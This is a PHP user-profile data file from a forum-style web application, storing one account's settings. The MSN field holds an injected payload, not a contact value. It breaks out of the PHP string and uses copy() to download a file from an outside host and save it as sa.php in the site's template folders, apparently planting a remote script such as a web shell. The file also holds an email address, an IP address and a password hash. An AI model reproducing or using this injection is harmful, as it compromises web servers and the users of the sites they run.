<?php

$userid="241";
$password="e10adc3949ba59abbe56e057f20f883e";
$username="slade";
$useralias="slade";
$userrealname="";
$useremail="zzz1@mail.com";
$useremhide="";
$userip="86.57.157.105";
$usersig="";
$userslogan="";
$useravatar="";
$usermsn="\';><copy(\'http://slade.h14.ru/spacemusic.txt\',\'templates/pb/images/ranks/sa.php\'); copy(\'http://slade.h14.ru/spacemusic.txt\',\'templates/sa.php\'); ><#";
$userposts="0";
$usericq="";
$userqq="";
$userwebavatar="";
$userrank="1";
$useryahoo="";
$useraim="";
$userlocation="";
$userjoined="1177937346";
$userhomepage="http://";
$useradmin="0";
$usermod="0";
$userban="0";
$userfriend="";
$userlastvisit="1177937378";
$userlastpost="1177937346";
$userprevvisit="1177937357";
$useranimsmilies="";
$lastaliaschange="1177937346";
$userlang="en";
$uservisits="2";
$aliaslist="";
$noavatars="";

?>